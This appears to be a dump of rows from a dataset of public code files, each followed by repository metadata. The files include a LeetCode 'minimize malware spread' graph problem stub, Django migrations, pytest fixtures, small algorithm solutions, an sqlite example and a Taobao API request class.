# In a network of nodes, each node i is directly connected to another node j if
# and only if graph[i][j] = 1.
#
# Some nodes initial are initially infected by malware. Whenever two nodes are
# directly connected and at least one of those two nodes is infected by
# malware, both nodes will be infected by malware. This spread of malware will
# continue until no more nodes can be infected in this manner.
#
# Suppose M(initial) is the final number of nodes infected with malware in the
# entire network, after the spread of malware stops.
#
# We will remove one node from the initial list, completely removing it and any
# connections from this node to any other node. Return the node that if
# removed, would minimize M(initial). If multiple nodes could be removed to
# minimize M(initial), return such a node with the smallest index.
#
#
#
#
#
#
#
# Example 1:
#
#
# Input: graph = [[1,1,0],[1,1,0],[0,0,1]], initial = [0,1]
# Output: 0
#
#
#
# Example 2:
#
#
# Input: graph = [[1,1,0],[1,1,1],[0,1,1]], initial = [0,1]
# Output: 1
#
#
#
# Example 3:
#
#
# Input: graph = [[1,1,0,0],[1,1,1,0],[0,1,1,1],[0,0,1,1]], initial = [0,1]
# Output: 1
#
#
#
#
# Note:
#
#
# 1 < graph.length = graph[0].length <= 300
# 0 <= graph[i][j] == graph[j][i] <= 1
# graph[i][i] = 1
# 1 <= initial.length < graph.length
# 0 <= initial[i] < graph.length
#
#
#
#
#
class Solution:
def minMalwareSpread(self, graph, initial):
"""
:type graph: List[List[int]]
:type initial: List[int]
:rtype: int
"""
| [
"frankie.y.liu@gmail.com"
] | frankie.y.liu@gmail.com |
cf18022549aef20a26f2714caf5b93d8f7efabc5 | af7df9d77a2545b54d8cd03e7f4633dce6125f4a | /ch01/dump_db_file.py | 08c49f7df3fa12cf40a63f58a162267690e31ca1 | [] | no_license | socrates77-sh/PP4E | 71e6522ea2e7cfd0c68c1e06ceb4d0716cc0f0bd | c92e69aea50262bfd63e95467ae4baf7cdc2f22f | refs/heads/master | 2020-05-29T08:46:47.380002 | 2018-11-16T10:38:44 | 2018-11-16T10:38:44 | 69,466,298 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | # -*- coding: utf-8 -*-
from make_db_file import loadDbase
db=loadDbase()
for key in db:
print(key, '=>\n', db[key])
print(db['sue']['name'])
| [
"zhwenrong@sina.com"
] | zhwenrong@sina.com |
80904623674486b0b93747232379e3d88873ba80 | 8a73cde463081afd76427d5af1e6837bfa51cc47 | /harvester/core/migrations/0025_delete_old_resources.py | 77fb7080cd64397347c6dd06423d07ea64ccfdb9 | [
"MIT"
] | permissive | surfedushare/search-portal | 8af4103ec6464e255c5462c672b30f32cd70b4e1 | 63e30ad0399c193fcb686804062cedf3930a093c | refs/heads/acceptance | 2023-06-25T13:19:41.051801 | 2023-06-06T13:37:01 | 2023-06-06T13:37:01 | 254,373,874 | 2 | 1 | MIT | 2023-06-06T12:04:44 | 2020-04-09T13:07:12 | Python | UTF-8 | Python | false | false | 494 | py | # Generated by Django 3.2.8 on 2021-10-25 13:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0024_pdf_thumbnails'),
]
operations = [
migrations.RemoveField(
model_name='tikaresource',
name='retainer_type',
),
migrations.DeleteModel(
name='FileResource',
),
migrations.DeleteModel(
name='TikaResource',
),
]
| [
"email@fakoberkers.nl"
] | email@fakoberkers.nl |
69fd3114d948b6199a0cea0eb3d2011db1a66155 | 5eb52c07e5b1bd00af77306f927f382b684cd6ff | /indy_node/test/pool_config/conftest.py | d7be1101c2ac8cde5ad4580c819339cd86ec230f | [
"Apache-2.0"
] | permissive | hyperledger/indy-node | bce39486988f5114581cff4f6d14fc1b7684143c | e6bb87d4c605aff9914491d062248b6ec857334c | refs/heads/main | 2023-09-03T15:33:08.187153 | 2023-05-08T22:48:21 | 2023-05-08T22:48:21 | 77,021,566 | 691 | 783 | Apache-2.0 | 2023-05-09T15:42:43 | 2016-12-21T05:45:04 | Python | UTF-8 | Python | false | false | 812 | py | import pytest
from indy_node.test.pool_config.helper import sdk_ensure_pool_config_sent
def genPoolConfig(writes: bool, force: bool):
return dict(writes=writes, force=force)
@pytest.fixture(scope='module')
def poolConfigWTFF():
return genPoolConfig(writes=True, force=False)
@pytest.fixture(scope='module')
def poolConfigWFFF():
return genPoolConfig(writes=False, force=False)
@pytest.fixture(scope='module')
def poolConfigWTFT():
return genPoolConfig(writes=True, force=True)
@pytest.fixture(scope='module')
def poolConfigWFFT():
return genPoolConfig(writes=False, force=True)
@pytest.fixture(scope="module")
def poolConfigSent(looper, nodeSet, sdk_pool_handle, sdk_wallet_trustee, poolCfg):
sdk_ensure_pool_config_sent(looper, sdk_pool_handle, sdk_wallet_trustee, poolCfg)
| [
"alexander.sherbakov@dsr-company.com"
] | alexander.sherbakov@dsr-company.com |
6afe4beed95660164eed8effffbe691f3fba898e | fca336a7d3ac6e314179f47f72a33021eb9fcde2 | /python/20.py | b696b6cc527a3ba4eceb7c5cc26c3ac15db08d8a | [] | no_license | iamFIREcracker/project-euler | e84adfdcdcf2859f9fd2e57670110f5a7022f074 | 5dc50d9b1b41761b95e14a49e3ab9a80e4498657 | refs/heads/master | 2021-07-11T11:44:38.453475 | 2017-10-15T16:36:05 | 2017-10-15T16:36:05 | 107,029,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | """Find the sum of the digits in the number 100!
"""
import operator
print sum([int(c) for c in str(reduce(operator.mul,
[i for i in xrange(1, 101)]))])
| [
"matteo@matteolandi.net"
] | matteo@matteolandi.net |
0010ddf6c6cc7080f556ea0f9f88f801902a9897 | 11d75881f729dc5e9ca08bfe6adae0fd64098056 | /dazzler/system/__init__.py | 13121628e6b1dffbb55124890f3bf3201073901a | [
"MIT"
] | permissive | jbampton/dazzler | b918723c4fd1f0015153247345156007581b0520 | 4018f6cbcb55a9f482cb5c5cbf6a06b063c15e21 | refs/heads/master | 2023-03-08T12:18:13.847188 | 2021-06-19T22:29:54 | 2021-06-20T13:23:18 | 218,608,116 | 1 | 0 | MIT | 2023-03-06T19:00:08 | 2019-10-30T19:38:15 | Python | UTF-8 | Python | false | false | 1,337 | py | """
Dazzler systems (API)
- Requirements are JS/CSS resources to include on rendering.
- Packages hold components info and it's requirements.
- Component Aspects are shared between backend and frontend with bindings.
- Generate components with ``dazzler generate metadata.json output_dir``
- Page holds meta data for rendering, requirements, routes, layout, bindings.
"""
from ._component import Component, Aspect # noqa: F401
from ._binding import * # noqa: F401, F403
from ._package import Package # noqa: F401
from ._requirements import ( # noqa: F401
Requirement,
RequirementWarning,
assets_to_requirements,
collect_requirements,
)
from ._generator import generate_components, generate_meta # noqa: F401
from ._undefined import UNDEFINED, Undefined # noqa: F401
from ._page import Page # noqa: F401
from ._middleware import Middleware # noqa: F401
from ._route import Route, RouteMethod # noqa: F401
__all__ = [ # noqa: F405
'Component',
'Aspect',
'BindingContext',
'Binding',
'Trigger',
'State',
'BoundAspect',
'Package',
'Requirement',
'RequirementWarning',
'assets_to_requirements',
'collect_requirements',
'generate_components',
'generate_meta',
'UNDEFINED',
'Undefined',
'Page',
'Middleware',
'Route',
'RouteMethod',
]
| [
"t4rk@outlook.com"
] | t4rk@outlook.com |
4e9c8e1528a41a397fcd5edc6922892c841935c6 | 37d2a09c274ce31f1e6f690c234c3447d4708d6a | /staicoin/cmds/units.py | d30bcc831278333eb79b7ac1af62fb23f2833875 | [
"Apache-2.0"
] | permissive | jzblanco/staicoin-blockchain | 60aedc566f475922e845ea019f2d8468f510a947 | 75a148429f6d39c36802c83b928ad8effbfc56a8 | refs/heads/main | 2023-08-17T13:11:46.094703 | 2021-10-08T23:13:49 | 2021-10-08T23:13:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | from typing import Dict
# The rest of the codebase uses mojos everywhere.
# Only use these units for user facing interfaces.
units: Dict[str, int] = {
"staicoin": 10 ** 9, # 1 staicoin (stai) is 1,000,000,000 mojo (1 billion)
"mojo:": 1,
"colouredcoin": 10 ** 3, # 1 coloured coin is 1000 colouredcoin mojos
}
| [
"em@iguru.team"
] | em@iguru.team |
77bd0747f7d7fc145ab0b45eefafd6f638002f18 | 72ec201effe17c3875f3d26ab98d6e56f808b0ac | /aoomuki_comp/app/migrations/0047_auto_20210202_1646.py | ad2ed545f6323c217246556f94f308312325f1d1 | [
"MIT"
] | permissive | Kamelgasmi/aoomuki_competences | 549f9c9167f82d084ef6048cec72e87fe90f4c35 | e02f3546f7efb54b825dbcfab968296607775903 | refs/heads/master | 2023-04-06T17:48:35.921460 | 2021-04-16T08:49:15 | 2021-04-16T08:49:15 | 330,929,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 764 | py | # Generated by Django 3.1.5 on 2021-02-02 15:46
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('app', '0046_auto_20210202_1147'),
]
operations = [
migrations.RemoveField(
model_name='listofcompetence',
name='Collaborater',
),
migrations.AddField(
model_name='listofcompetence',
name='User',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Utilisateur'),
),
]
| [
"kam_7@hotmail.fr"
] | kam_7@hotmail.fr |
dfd731d95d35d7ba3ca64ab77bed8a8cf155b40b | 950884cea2a67bc2047c8a7c278d1cbf7f657b29 | /submits.2015/14_57_48_33_1_8767.py | ce10341e2c19add871a9204b5ab9e64b55c845fd | [] | no_license | lisiynos/loo2015 | ac5bd8d1d81c301be0e65960c3707506120f0b7f | cf3d12589c9e586921c2a38554103fc1c7652abe | refs/heads/master | 2020-12-25T17:35:50.917577 | 2016-08-29T09:31:40 | 2016-08-29T09:31:40 | 29,869,192 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | with open('hall.in', 'r') as infile:
a, b, c, d = [int(x) for x in infile.readline().split()]
hall_counter = 0
for x in range(1, b + 1):
for y in range(1, b + 1):
if c <= (x + y) * 2 <= d and a <= x * y <= b:
hall_counter += 1
hall_counter = str(int((hall_counter + 1)/2))
with open('hall.out', 'w') as outfile:
outfile.write(hall_counter) | [
"super.denis@gmail.com"
] | super.denis@gmail.com |
0ec0747aea6f065bfb873f5d9291c4687494bf7b | 77900cdd9a815caf1cd04705321ca93f5072179f | /Project2/Project2/.history/blog/views_20211114183757.py | 5bdf30cc1996d4f9f8116bb63430e3540af0ba18 | [] | no_license | Bom19990111/helloword_python | 717799d994223d65de5adaeabecf396ff2bc1fb7 | 2ee2e67a60043f03c1ce4b070470c7d2dcdc72a7 | refs/heads/master | 2023-09-06T04:17:02.057628 | 2021-11-21T20:00:46 | 2021-11-21T20:00:46 | 407,063,273 | 0 | 1 | null | 2021-11-21T20:00:47 | 2021-09-16T07:18:35 | Python | UTF-8 | Python | false | false | 212 | py | from django.shortcuts import render, get_object_or_404
from .models import Blog
from django.views import generic
# Create your views here.
class BlogList(generic.ListView):
queryset = Blog.objects.filter(st) | [
"phanthituyngoc1995@gmail.com"
] | phanthituyngoc1995@gmail.com |
2a75f41f27e37ffea0a9f08cd9194e665ffb1f11 | fcbedcc2f7483a4b3ce9111c9c889bd4a5079496 | /sql/sqlg.py | 899817382ff5aeea50f67d3d8c32f2d871fad008 | [] | no_license | kevlab/RealPython2 | aab94de91d0824290bfce4a318f57f4fe5282f19 | a85f92563b414830431a79d2448682da0c12d645 | refs/heads/master | 2021-01-10T19:10:46.035344 | 2015-05-27T02:24:48 | 2015-05-27T02:24:48 | 31,555,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 465 | py | # UPDATE and DELETE statements
import sqlite3
with sqlite3.connect('new.db') as connection:
c = connection.cursor()
# update
c.execute("""UPDATE population SET population = 9000000 WHERE
city ='New York City'""")
# delete
c.execute("DELETE FROM population WHERE city='Boston'")
print "\nNEW DATA:\n"
c.execute("SELECT * FROM population")
rows = c.fetchall()
for r in rows:
print r[0], r[1], r[2]
| [
"greenleaf1348@gmail.com"
] | greenleaf1348@gmail.com |
84e69319d015573313a7536fe6d36c82f50e5297 | 75dcb56e318688499bdab789262839e7f58bd4f6 | /_algorithms_challenges/leetcode/LeetcodePythonProject/leetcode_0001_0050/LeetCode003_LongestSubstingWithoutRepeatingCharacters.py | 7161fed14178c544c2c29ac5762c77a963af8832 | [] | no_license | syurskyi/Algorithms_and_Data_Structure | 9a1f358577e51e89c862d0f93f373b7f20ddd261 | 929dde1723fb2f54870c8a9badc80fc23e8400d3 | refs/heads/master | 2023-02-22T17:55:55.453535 | 2022-12-23T03:15:00 | 2022-12-23T03:15:00 | 226,243,987 | 4 | 1 | null | 2023-02-07T21:01:45 | 2019-12-06T04:14:10 | Jupyter Notebook | UTF-8 | Python | false | false | 828 | py | '''
Created on May 5, 2017
@author: MT
'''
class Solution(object):
def lengthOfLongestSubstring(self, s):
"""
:type s: str
:rtype: int
"""
left = 0
hashset = set()
maxLen = 0
for i, c in enumerate(s):
while left < i and c in hashset:
hashset.discard(s[left])
left += 1
hashset.add(c)
maxLen = max(maxLen, i-left+1)
return maxLen
def test(self):
testCases = [
'abc',
'bbbb',
'abcdba',
]
for s in testCases:
print('s: %s' % s)
result = self.lengthOfLongestSubstring(s)
print('result: %s' % result)
print('-='*30+'-')
if __name__ == '__main__':
Solution().test()
| [
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
b55e6344c718b94dc01be9ce249c8634c25f9516 | 7fbb4f70493a27d2b0fe2c107a1055e493bf7188 | /taobao-tianmao/top/api/rest/TmallExchangeMessagesGetRequest.py | 67817273e9db4bf66611b203f8cb229606beb032 | [
"Apache-2.0"
] | permissive | ScottLeeF/python-example | da9d78a85cce914153f1c5ad662d28cddde0fc0f | 0b230ba80fe5020d70329a9d73e058013f0ca111 | refs/heads/master | 2022-12-03T00:24:47.035304 | 2020-04-21T09:51:12 | 2020-04-21T09:51:12 | 242,459,649 | 0 | 0 | Apache-2.0 | 2022-11-22T05:29:21 | 2020-02-23T05:03:19 | Python | UTF-8 | Python | false | false | 471 | py | '''
Created by auto_sdk on 2018.08.09
'''
from top.api.base import RestApi
class TmallExchangeMessagesGetRequest(RestApi):
def __init__(self, domain='gw.api.taobao.com', port=80):
RestApi.__init__(self, domain, port)
self.dispute_id = None
self.fields = None
self.operator_roles = None
self.page_no = None
self.page_size = None
def getapiname(self):
return 'tmall.exchange.messages.get'
| [
"fei.li@tuanche.com"
] | fei.li@tuanche.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.